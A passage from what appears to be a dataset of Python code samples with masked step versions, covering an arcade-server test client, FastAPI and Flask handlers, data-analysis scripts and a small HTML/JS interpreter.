\"response/lobby/e/ga\")\n self.assert_path(resp, \"response/lobby/e/gp\")\n self.assert_path(resp, \"response/lobby/e/la\")\n self.assert_path(resp, \"response/lobby/e/ver\")\n return resp.child_value('lobby/eid')\n\n def verify_lobby_delete(self, eid: int) -> None:\n call = self.call_node()\n\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'delete')\n lobby.add_child(Node.s32('eid', eid))\n call.add_child(lobby)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/lobby\")\n\n def verify_pzlcmt_read(self, extid: int) -> None:\n call = self.call_node()\n\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_read')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.s32('time', 0))\n info.add_child(Node.s32('limit', 30))\n call.add_child(info)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/info/comment/time\")\n self.assert_path(resp, \"response/info/c/uid\")\n self.assert_path(resp, \"response/info/c/name\")\n self.assert_path(resp, \"response/info/c/icon\")\n self.assert_path(resp, \"response/info/c/bln\")\n self.assert_path(resp, \"response/info/c/tid\")\n self.assert_path(resp, \"response/info/c/t_name\")\n self.assert_path(resp, \"response/info/c/pref\")\n self.assert_path(resp, \"response/info/c/time\")\n self.assert_path(resp, \"response/info/c/comment\")\n self.assert_path(resp, \"response/info/c/is_tweet\")\n\n # Verify we posted our comment earlier\n found = False\n for child in resp.child('info').children:\n if child.name != 'c':\n continue\n if child.child_value('uid') == extid:\n name = child.child_value('name')\n comment = child.child_value('comment')\n if name != self.NAME:\n raise Exception('Invalid name \\'{}\\' returned for comment!'.format(name))\n if comment != 'アメ〜〜!':\n raise Exception('Invalid comment \\'{}\\' returned for comment!'.format(comment))\n found = True\n\n if not found:\n raise Exception('Comment we posted was not found!')\n\n def verify_pzlcmt_write(self, extid: int) -> None:\n call = self.call_node()\n\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_write')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.string('name', self.NAME))\n info.add_child(Node.s16('icon', 0))\n info.add_child(Node.s8('bln', 0))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.string('t_name', ''))\n info.add_child(Node.s8('pref', 51))\n info.add_child(Node.s32('time', int(time.time())))\n info.add_child(Node.string('comment', 'アメ〜〜!'))\n info.add_child(Node.bool('is_tweet', True))\n call.add_child(info)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/info\")\n\n def verify_jbrbcollabo_save(self, refid: str) -> None:\n call = self.call_node()\n\n jbrbcollabo = Node.void('jbrbcollabo')\n jbrbcollabo.set_attribute('method', 'save')\n jbrbcollabo.add_child(Node.string('ref_id', refid))\n jbrbcollabo.add_child(Node.u16('cre_count', 0))\n call.add_child(jbrbcollabo)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/jbrbcollabo\")\n\n def verify(self, cardid: Optional[str]) -> None:\n # Verify boot sequence is okay\n self.verify_services_get(\n expected_services=[\n 'pcbtracker',\n 'pcbevent',\n 'local',\n 'message',\n 'facility',\n 'cardmng',\n 'package',\n 'posevent',\n 'pkglist',\n 'dlstatus',\n 'eacoin',\n 'lobby',\n 'ntp',\n 'keepalive'\n ]\n )\n paseli_enabled = self.verify_pcbtracker_alive()\n self.verify_message_get()\n self.verify_package_list()\n location = self.verify_facility_get()\n self.verify_pcbevent_put()\n self.verify_pcb_boot(location)\n self.verify_info_common()\n\n # Verify card registration and profile lookup\n if cardid is not None:\n card = cardid\n else:\n card = self.random_card()\n print(\"Generated random card ID {} for use.\".format(card))\n\n if cardid is None:\n self.verify_cardmng_inquire(card, msg_type='unregistered', paseli_enabled=paseli_enabled)\n ref_id = self.verify_cardmng_getrefid(card)\n if len(ref_id) != 16:\n raise Exception('Invalid refid \\'{}\\' returned when registering card'.format(ref_id))\n if ref_id != self.verify_cardmng_inquire(card, msg_type='new', paseli_enabled=paseli_enabled):\n raise Exception('Invalid refid \\'{}\\' returned when querying card'.format(ref_id))\n # Always get a player start, regardless of new profile or not\n self.verify_player_start(ref_id)\n self.verify_player_delete(ref_id)\n self.verify_player_succeed(ref_id)\n extid = self.verify_player_write(\n ref_id,\n location,\n [{\n 'id': 0,\n 'chart': 0,\n 'clear_type': -1,\n 'achievement_rate': 0,\n 'score': 0,\n 'combo': 0,\n 'miss_count': 0,\n }]\n )\n else:\n print(\"Skipping new card checks for existing card\")\n ref_id = self.verify_cardmng_inquire(card, msg_type='query', paseli_enabled=paseli_enabled)\n\n # Verify pin handling and return card handling\n self.verify_cardmng_authpass(ref_id, correct=True)\n self.verify_cardmng_authpass(ref_id, correct=False)\n if ref_id != self.verify_cardmng_inquire(card, msg_type='query', paseli_enabled=paseli_enabled):\n raise Exception('Invalid refid \\'{}\\' returned when querying card'.format(ref_id))\n\n # Verify lobby functionality\n self.verify_lobby_read(location, extid)\n eid = self.verify_lobby_entry(location, extid)\n self.verify_lobby_delete(eid)\n\n # Verify puzzle comment read and write\n self.verify_pzlcmt_write(extid)\n self.verify_pzlcmt_read(extid)\n\n # Verify Jubeat/ReflecBeat collabo save\n self.verify_jbrbcollabo_save(ref_id)\n\n if cardid is None:\n # Verify score saving and updating\n for phase in [1, 2]:\n if phase == 1:\n dummyscores = [\n # An okay score on a chart\n {\n 'id': 1,\n 'chart': 1,\n 'clear_type': 2,\n 'achievement_rate': 7543,\n 'score': 432,\n 'combo': 123,\n 'miss_count': 5,\n },\n # A good score on an easier chart of the same song\n {\n 'id': 1,\n 'chart': 0,\n 'clear_type': 4,\n 'achievement_rate': 9876,\n 'score': 543,\n 'combo': 543,\n 'miss_count': 0,\n },\n # A bad score on a hard chart\n {\n 'id': 3,\n 'chart': 2,\n 'clear_type': 2,\n 'achievement_rate': 1234,\n 'score': 123,\n 'combo': 42,\n 'miss_count': 54,\n },\n # A terrible score on an easy chart\n {\n 'id': 3,\n 'chart': 0,\n 'clear_type': 2,\n 'achievement_rate': 1024,\n 'score': 50,\n 'combo': 12,\n 'miss_count': 90,\n },\n ]\n if phase == 2:\n dummyscores = [\n # A better score on the same chart\n {\n 'id': 1,\n 'chart': 1,\n 'clear_type': 3,\n 'achievement_rate': 8765,\n 'score': 469,\n 'combo': 468,\n 'miss_count': 1,\n },\n # A worse score on another same chart\n {\n 'id': 1,\n 'chart': 0,\n 'clear_type': 2,\n 'achievement_rate': 8765,\n 'score': 432,\n 'combo': 321,\n 'miss_count': 15,\n 'expected_score': 543,\n 'expected_clear_type': 4,\n 'expected_achievement_rate': 9876,\n 'expected_combo': 543,\n 'expected_miss_count': 0,\n },\n ]\n self.verify_player_write(ref_id, location, dummyscores)\n\n scores = self.verify_player_read(ref_id, location)\n for expected in dummyscores:\n actual = None\n for received in scores:\n if received['id'] == expected['id'] and received['chart'] == expected['chart']:\n actual = received\n break\n\n if actual is None:\n raise Exception(\"Didn't find song {} chart {} in response!\".format(expected['id'], expected['chart']))\n\n if 'expected_score' in expected:\n expected_score = expected['expected_score']\n else:\n expected_score = expected['score']\n if 'expected_achievement_rate' in expected:\n expected_achievement_rate = expected['expected_achievement_rate']\n else:\n expected_achievement_rate = expected['achievement_rate']\n if 'expected_clear_type' in expected:\n expected_clear_type = expected['expected_clear_type']\n else:\n expected_clear_type = expected['clear_type']\n if 'expected_combo' in expected:\n expected_combo = expected['expected_combo']\n else:\n expected_combo = expected['combo']\n if 'expected_miss_count' in expected:\n expected_miss_count = expected['expected_miss_count']\n else:\n expected_miss_count = expected['miss_count']\n\n if actual['score'] != expected_score:\n raise Exception('Expected a score of \\'{}\\' for song \\'{}\\' chart \\'{}\\' but got score \\'{}\\''.format(\n expected_score, expected['id'], expected['chart'], actual['score'],\n ))\n if actual['achievement_rate'] != expected_achievement_rate:\n raise Exception('Expected an achievement rate of \\'{}\\' for song \\'{}\\' chart \\'{}\\' but got achievement rate \\'{}\\''.format(\n expected_achievement_rate, expected['id'], expected['chart'], actual['achievement_rate'],\n ))\n if actual['clear_type'] != expected_clear_type:\n raise Exception('Expected a clear_type of \\'{}\\' for song \\'{}\\' chart \\'{}\\' but got clear_type \\'{}\\''.format(\n expected_clear_type, expected['id'], expected['chart'], actual['clear_type'],\n ))\n if actual['combo'] != expected_combo:\n raise Exception('Expected a combo of \\'{}\\' for song \\'{}\\' chart \\'{}\\' but got combo \\'{}\\''.format(\n expected_combo, expected['id'], expected['chart'], actual['combo'],\n ))\n if actual['miss_count'] != expected_miss_count:\n raise Exception('Expected a miss count of \\'{}\\' for song \\'{}\\' chart \\'{}\\' but got miss count \\'{}\\''.format(\n expected_miss_count, expected['id'], expected['chart'], actual['miss_count'],\n ))\n\n # Sleep so we don't end up putting in score history on the same second\n time.sleep(1)\n\n else:\n print(\"Skipping score checks for existing card\")\n\n # Verify ending game\n self.verify_player_end(ref_id)\n\n # Verify high score tables\n self.verify_info_ranking()\n\n # Verify paseli handling\n if paseli_enabled:\n print(\"PASELI enabled for this PCBID, executing PASELI checks\")\n else:\n print(\"PASELI disabled for this PCBID, skipping PASELI checks\")\n return\n\n sessid, balance = self.verify_eacoin_checkin(card)\n if balance == 0:\n print(\"Skipping PASELI consume check because card has 0 balance\")\n else:\n self.verify_eacoin_consume(sessid, balance, random.randint(0, balance))\n self.verify_eacoin_checkout(sessid)\n",
"step-ids": [
13,
14,
16,
18,
20
]
}
|
[
13,
14,
16,
18,
20
] |
from fastapi import APIRouter, Depends
from fastapi.responses import RedirectResponse
import app.setting as setting
from app.dependencies import get_project_by_prefix
from app.entities.project import Project
router = APIRouter(
prefix="/go",
)
@router.get("/{prefix_id}")
def redirect_to_board(project: Project = Depends(get_project_by_prefix)):
return RedirectResponse(url=project.notion_board_url)
@router.get("/{prefix_id}/{ticket_id}")
def redirect_to_ticket(
ticket_id: str, project: Project = Depends(get_project_by_prefix)
):
ticket = project.query_ticket(ticket_id=ticket_id)
notion_url = setting.notion_base_url + ticket.id.replace("-", "")
return RedirectResponse(url=notion_url)
|
normal
|
{
"blob_id": "49b295c3e323695779eb32181193ef88b678b34d",
"index": 6340,
"step-1": "<mask token>\n\n\[email protected]('/{prefix_id}')\ndef redirect_to_board(project: Project=Depends(get_project_by_prefix)):\n return RedirectResponse(url=project.notion_board_url)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/{prefix_id}')\ndef redirect_to_board(project: Project=Depends(get_project_by_prefix)):\n return RedirectResponse(url=project.notion_board_url)\n\n\[email protected]('/{prefix_id}/{ticket_id}')\ndef redirect_to_ticket(ticket_id: str, project: Project=Depends(\n get_project_by_prefix)):\n ticket = project.query_ticket(ticket_id=ticket_id)\n notion_url = setting.notion_base_url + ticket.id.replace('-', '')\n return RedirectResponse(url=notion_url)\n",
"step-3": "<mask token>\nrouter = APIRouter(prefix='/go')\n\n\[email protected]('/{prefix_id}')\ndef redirect_to_board(project: Project=Depends(get_project_by_prefix)):\n return RedirectResponse(url=project.notion_board_url)\n\n\[email protected]('/{prefix_id}/{ticket_id}')\ndef redirect_to_ticket(ticket_id: str, project: Project=Depends(\n get_project_by_prefix)):\n ticket = project.query_ticket(ticket_id=ticket_id)\n notion_url = setting.notion_base_url + ticket.id.replace('-', '')\n return RedirectResponse(url=notion_url)\n",
"step-4": "from fastapi import APIRouter, Depends\nfrom fastapi.responses import RedirectResponse\nimport app.setting as setting\nfrom app.dependencies import get_project_by_prefix\nfrom app.entities.project import Project\nrouter = APIRouter(prefix='/go')\n\n\[email protected]('/{prefix_id}')\ndef redirect_to_board(project: Project=Depends(get_project_by_prefix)):\n return RedirectResponse(url=project.notion_board_url)\n\n\[email protected]('/{prefix_id}/{ticket_id}')\ndef redirect_to_ticket(ticket_id: str, project: Project=Depends(\n get_project_by_prefix)):\n ticket = project.query_ticket(ticket_id=ticket_id)\n notion_url = setting.notion_base_url + ticket.id.replace('-', '')\n return RedirectResponse(url=notion_url)\n",
"step-5": "from fastapi import APIRouter, Depends\nfrom fastapi.responses import RedirectResponse\n\nimport app.setting as setting\nfrom app.dependencies import get_project_by_prefix\nfrom app.entities.project import Project\n\n\nrouter = APIRouter(\n prefix=\"/go\",\n)\n\n\[email protected](\"/{prefix_id}\")\ndef redirect_to_board(project: Project = Depends(get_project_by_prefix)):\n return RedirectResponse(url=project.notion_board_url)\n\n\[email protected](\"/{prefix_id}/{ticket_id}\")\ndef redirect_to_ticket(\n ticket_id: str, project: Project = Depends(get_project_by_prefix)\n):\n ticket = project.query_ticket(ticket_id=ticket_id)\n notion_url = setting.notion_base_url + ticket.id.replace(\"-\", \"\")\n return RedirectResponse(url=notion_url)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import constants
from auth.storage import Storage
from utils import create_error_with_status
from flask import jsonify, request, current_app
def register_user():
try:
email = request.json["email"]
password = request.json["password"]
except KeyError:
status = constants.statuses["user"]["missingData"]
body = create_error_with_status(status, "missing user data")
current_app.logger.warn("Not enough data for sing-up")
return jsonify(body), constants.responses[status]
current_app.logger.info(f"Sing up for {email}")
status = Storage.add_user(email, password)
http_status = constants.responses[status]
if status == constants.statuses["user"]["created"]:
body = dict(status=status, email=email)
else: # status == constants.statuses["user"]["emailUsed"]:
body = create_error_with_status(status, "email {{email}} is already registered", email=email)
return jsonify(body), http_status
|
normal
|
{
"blob_id": "73a4b3497952f90029ba24b73b835de53fc687ec",
"index": 3349,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef register_user():\n try:\n email = request.json['email']\n password = request.json['password']\n except KeyError:\n status = constants.statuses['user']['missingData']\n body = create_error_with_status(status, 'missing user data')\n current_app.logger.warn('Not enough data for sing-up')\n return jsonify(body), constants.responses[status]\n current_app.logger.info(f'Sing up for {email}')\n status = Storage.add_user(email, password)\n http_status = constants.responses[status]\n if status == constants.statuses['user']['created']:\n body = dict(status=status, email=email)\n else:\n body = create_error_with_status(status,\n 'email {{email}} is already registered', email=email)\n return jsonify(body), http_status\n",
"step-3": "import constants\nfrom auth.storage import Storage\nfrom utils import create_error_with_status\nfrom flask import jsonify, request, current_app\n\n\ndef register_user():\n try:\n email = request.json['email']\n password = request.json['password']\n except KeyError:\n status = constants.statuses['user']['missingData']\n body = create_error_with_status(status, 'missing user data')\n current_app.logger.warn('Not enough data for sing-up')\n return jsonify(body), constants.responses[status]\n current_app.logger.info(f'Sing up for {email}')\n status = Storage.add_user(email, password)\n http_status = constants.responses[status]\n if status == constants.statuses['user']['created']:\n body = dict(status=status, email=email)\n else:\n body = create_error_with_status(status,\n 'email {{email}} is already registered', email=email)\n return jsonify(body), http_status\n",
"step-4": "import constants\nfrom auth.storage import Storage\n\nfrom utils import create_error_with_status\n\nfrom flask import jsonify, request, current_app\n\n\ndef register_user():\n try:\n email = request.json[\"email\"]\n password = request.json[\"password\"]\n except KeyError:\n status = constants.statuses[\"user\"][\"missingData\"]\n body = create_error_with_status(status, \"missing user data\")\n current_app.logger.warn(\"Not enough data for sing-up\")\n return jsonify(body), constants.responses[status]\n\n current_app.logger.info(f\"Sing up for {email}\")\n\n status = Storage.add_user(email, password)\n http_status = constants.responses[status]\n\n if status == constants.statuses[\"user\"][\"created\"]:\n body = dict(status=status, email=email)\n else: # status == constants.statuses[\"user\"][\"emailUsed\"]:\n body = create_error_with_status(status, \"email {{email}} is already registered\", email=email)\n return jsonify(body), http_status\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# %load q03_skewness_log/build.py
from scipy.stats import skew
import pandas as pd
import numpy as np
data = pd.read_csv('data/train.csv')
# Write code here:
def skewness_log(df):
df['SalePrice_New'] = np.log(df['SalePrice'])
df['GrLivArea_New'] = np.log(df['GrLivArea'])
skewed_slPri = skew(df['SalePrice_New'])
skewness_grLiv = skew(df['GrLivArea_New'])
return skewness_grLiv,skewed_slPri
|
normal
|
{
"blob_id": "f5bd41f4aaff616a332d80ec44c364ffc91c58f0",
"index": 265,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef skewness_log(df):\n df['SalePrice_New'] = np.log(df['SalePrice'])\n df['GrLivArea_New'] = np.log(df['GrLivArea'])\n skewed_slPri = skew(df['SalePrice_New'])\n skewness_grLiv = skew(df['GrLivArea_New'])\n return skewness_grLiv, skewed_slPri\n",
"step-3": "<mask token>\ndata = pd.read_csv('data/train.csv')\n\n\ndef skewness_log(df):\n df['SalePrice_New'] = np.log(df['SalePrice'])\n df['GrLivArea_New'] = np.log(df['GrLivArea'])\n skewed_slPri = skew(df['SalePrice_New'])\n skewness_grLiv = skew(df['GrLivArea_New'])\n return skewness_grLiv, skewed_slPri\n",
"step-4": "from scipy.stats import skew\nimport pandas as pd\nimport numpy as np\ndata = pd.read_csv('data/train.csv')\n\n\ndef skewness_log(df):\n df['SalePrice_New'] = np.log(df['SalePrice'])\n df['GrLivArea_New'] = np.log(df['GrLivArea'])\n skewed_slPri = skew(df['SalePrice_New'])\n skewness_grLiv = skew(df['GrLivArea_New'])\n return skewness_grLiv, skewed_slPri\n",
"step-5": "# %load q03_skewness_log/build.py\nfrom scipy.stats import skew\nimport pandas as pd\nimport numpy as np\n\ndata = pd.read_csv('data/train.csv')\n\n\n# Write code here:\ndef skewness_log(df):\n df['SalePrice_New'] = np.log(df['SalePrice'])\n df['GrLivArea_New'] = np.log(df['GrLivArea'])\n skewed_slPri = skew(df['SalePrice_New'])\n skewness_grLiv = skew(df['GrLivArea_New'])\n return skewness_grLiv,skewed_slPri\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, ForeignKey, Float
from sqlalchemy.orm import relationship, backref
ORMBase = declarative_base()
def create_all(engine):
ORMBase.metadata.create_all(engine)
|
normal
|
{
"blob_id": "c7ca8235864ce5de188c4aa2feb9ad82d4fa9b0f",
"index": 4023,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_all(engine):\n ORMBase.metadata.create_all(engine)\n",
"step-3": "<mask token>\nORMBase = declarative_base()\n\n\ndef create_all(engine):\n ORMBase.metadata.create_all(engine)\n",
"step-4": "from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, ForeignKey, Float\nfrom sqlalchemy.orm import relationship, backref\nORMBase = declarative_base()\n\n\ndef create_all(engine):\n ORMBase.metadata.create_all(engine)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import calendar
import json
from datetime import datetime
from datapoller.download import download
from datapoller.settings import *
from messaging.Messaging import sendMessage
from messaging.settings import RABBIT_NOTIFY_QUEUE
from sessioncontroller.utils import is_level_interesting_for_kp
__author__ = 'arik'
sharedDict = {}
def registerModelStorage(dict):
global sharedDict
sharedDict = dict
def updateModel():
(lastLevels, validTime) = download(NOWCAST_DATA_URL)
sharedDict['lastLevels'] = lastLevels
sharedDict['validTime'] = validTime
def hasValidModel():
lastLevels = sharedDict.get('lastLevels')
validTime = sharedDict.get('validTime')
return lastLevels is not None and validTime is not None and \
getTimestamp(validTime) >= getTimestamp(datetime.utcnow())
def processUserLocation(geo_id, geo, kp_level, chat_id, bot):
if hasValidModel() is False:
return
lastLevels = sharedDict.get('lastLevels')
validTime = sharedDict.get('validTime')
level = lastLevels[geo_id]
if kp_level is None or is_level_interesting_for_kp(level, kp_level):
sendMessage(
RABBIT_NOTIFY_QUEUE,
json.dumps({"time": getTimestamp(validTime), "geo": geo, "chat_id": chat_id, "level": level, "bot": bot})
)
def getTimestamp(datetime):
return calendar.timegm(datetime.timetuple())
|
normal
|
{
"blob_id": "e8f090a02bfd5ee8a6832351357594af2d6692f9",
"index": 8702,
"step-1": "<mask token>\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\n<mask token>\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-2": "<mask token>\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\n<mask token>\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(RABBIT_NOTIFY_QUEUE, json.dumps({'time': getTimestamp(\n validTime), 'geo': geo, 'chat_id': chat_id, 'level': level,\n 'bot': bot}))\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-3": "<mask token>\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\ndef hasValidModel():\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n return lastLevels is not None and validTime is not None and getTimestamp(\n validTime) >= getTimestamp(datetime.utcnow())\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(RABBIT_NOTIFY_QUEUE, json.dumps({'time': getTimestamp(\n validTime), 'geo': geo, 'chat_id': chat_id, 'level': level,\n 'bot': bot}))\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-4": "<mask token>\n__author__ = 'arik'\nsharedDict = {}\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\ndef hasValidModel():\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n return lastLevels is not None and validTime is not None and getTimestamp(\n validTime) >= getTimestamp(datetime.utcnow())\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(RABBIT_NOTIFY_QUEUE, json.dumps({'time': getTimestamp(\n validTime), 'geo': geo, 'chat_id': chat_id, 'level': level,\n 'bot': bot}))\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-5": "import calendar\nimport json\nfrom datetime import datetime\nfrom datapoller.download import download\nfrom datapoller.settings import *\nfrom messaging.Messaging import sendMessage\nfrom messaging.settings import RABBIT_NOTIFY_QUEUE\nfrom sessioncontroller.utils import is_level_interesting_for_kp\n\n__author__ = 'arik'\n\nsharedDict = {}\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\ndef updateModel():\n (lastLevels, validTime) = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\ndef hasValidModel():\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n return lastLevels is not None and validTime is not None and \\\n getTimestamp(validTime) >= getTimestamp(datetime.utcnow())\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(\n RABBIT_NOTIFY_QUEUE,\n json.dumps({\"time\": getTimestamp(validTime), \"geo\": geo, \"chat_id\": chat_id, \"level\": level, \"bot\": bot})\n )\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-ids": [
3,
4,
5,
6,
8
]
}
|
[
3,
4,
5,
6,
8
] |
import graphics
import ply.lex as lex
import ply.yacc as yacc
import jstokens
import jsgrammar
def interpret(trees): # Hello, friend
for tree in trees: # Hello,
# ("word-element","Hello")
nodetype=tree[0] # "word-element"
if nodetype == "word-element":
graphics.word(tree[1])
elif nodetype == "tag-element":
# <b>Strong text</b>
tagname = tree[1] # b
tagargs = tree[2] # []
subtrees = tree[3] # ...Strong Text!...
closetagname = tree[4] # b
if(tagname!=closetagname):
graphics.warning("mismatched tag")
else:
graphics.begintag(tagname,tagargs)
interpret(subtrees)
graphics.endtag()
elif nodetype == "javascript-element":
jstext = tree[1]; # "document.write(55);"
jslexer = lex.lex(module=jstokens)
jsparser = yacc.yacc(module=jsgrammar)
jstree = jsparser.parse(jstext,lexer=jslexer)
# jstree is a parse tree for JavaScript
result = jsinterp.interpret(jstree)
graphics.word(result)
|
normal
|
{
"blob_id": "f3b3bee494493263f8b00827e6f3ff3a1dcd8c37",
"index": 6144,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef interpret(trees):\n for tree in trees:\n nodetype = tree[0]\n if nodetype == 'word-element':\n graphics.word(tree[1])\n elif nodetype == 'tag-element':\n tagname = tree[1]\n tagargs = tree[2]\n subtrees = tree[3]\n closetagname = tree[4]\n if tagname != closetagname:\n graphics.warning('mismatched tag')\n else:\n graphics.begintag(tagname, tagargs)\n interpret(subtrees)\n graphics.endtag()\n elif nodetype == 'javascript-element':\n jstext = tree[1]\n jslexer = lex.lex(module=jstokens)\n jsparser = yacc.yacc(module=jsgrammar)\n jstree = jsparser.parse(jstext, lexer=jslexer)\n result = jsinterp.interpret(jstree)\n graphics.word(result)\n",
"step-3": "import graphics\nimport ply.lex as lex\nimport ply.yacc as yacc\nimport jstokens\nimport jsgrammar\n\n\ndef interpret(trees):\n for tree in trees:\n nodetype = tree[0]\n if nodetype == 'word-element':\n graphics.word(tree[1])\n elif nodetype == 'tag-element':\n tagname = tree[1]\n tagargs = tree[2]\n subtrees = tree[3]\n closetagname = tree[4]\n if tagname != closetagname:\n graphics.warning('mismatched tag')\n else:\n graphics.begintag(tagname, tagargs)\n interpret(subtrees)\n graphics.endtag()\n elif nodetype == 'javascript-element':\n jstext = tree[1]\n jslexer = lex.lex(module=jstokens)\n jsparser = yacc.yacc(module=jsgrammar)\n jstree = jsparser.parse(jstext, lexer=jslexer)\n result = jsinterp.interpret(jstree)\n graphics.word(result)\n",
"step-4": "import graphics\nimport ply.lex as lex\nimport ply.yacc as yacc\nimport jstokens\nimport jsgrammar\n\ndef interpret(trees): # Hello, friend\n for tree in trees: # Hello,\n # (\"word-element\",\"Hello\")\n nodetype=tree[0] # \"word-element\"\n if nodetype == \"word-element\":\n graphics.word(tree[1]) \n elif nodetype == \"tag-element\":\n # <b>Strong text</b>\n tagname = tree[1] # b\n tagargs = tree[2] # []\n subtrees = tree[3] # ...Strong Text!...\n closetagname = tree[4] # b\n if(tagname!=closetagname):\n graphics.warning(\"mismatched tag\")\n else:\n graphics.begintag(tagname,tagargs)\n interpret(subtrees)\n graphics.endtag()\n elif nodetype == \"javascript-element\":\n jstext = tree[1]; # \"document.write(55);\"\n jslexer = lex.lex(module=jstokens)\n jsparser = yacc.yacc(module=jsgrammar)\n jstree = jsparser.parse(jstext,lexer=jslexer)\n # jstree is a parse tree for JavaScript\n result = jsinterp.interpret(jstree)\n graphics.word(result)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# add some description here
import glob
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import xarray as xr
import pandas as pd
import os
import pickle
from scipy.interpolate import griddata
from mpl_toolkits.basemap import Basemap
from mpl_toolkits.axes_grid1 import make_axes_locatable
from matplotlib import dates
import datetime
import matplotlib
matplotlib.style.use('ggplot')
import sys
sys.path.append('masterThesisPack/')
import masterThesisPack as oceano
BASE_DIR = oceano.make_dir()
DATA_DIR = BASE_DIR.replace('github/', 'ventopcse/data/')
SAVE_DIR = BASE_DIR + 'dissertacao/presentation/figures/'
# importing laje de santos data
raw = xr.open_dataset(DATA_DIR+'Est_lajeSantos/lajesantos.nc')
raw = raw.to_dataframe()
# cut only a period
# raw = raw['2015-04':]
data = raw.copy()
treat = data.copy()
treat[treat > 3*treat.std()] = np.nan
std = treat.wind_along.std()
fig,ax = plt.subplots()
raw.wind_along.plot(ax=ax)
ax.axhline(y=3*std,c='k',ls='dashed')
ax.axhline(y=-3*std,c='k',ls='dashed')
ax.set_ylabel(r'Vento a 10m de altura [m.s$^{-1}$]')
# plt.savefig(SAVE_DIR.replace('github','gitlab') + 'qualityControl.png',dpi=250)
|
normal
|
{
"blob_id": "4c1fea4dcf143ec976d3956039616963760d5af6",
"index": 5030,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nmatplotlib.style.use('ggplot')\n<mask token>\nsys.path.append('masterThesisPack/')\n<mask token>\nraw.wind_along.plot(ax=ax)\nax.axhline(y=3 * std, c='k', ls='dashed')\nax.axhline(y=-3 * std, c='k', ls='dashed')\nax.set_ylabel('Vento a 10m de altura [m.s$^{-1}$]')\n",
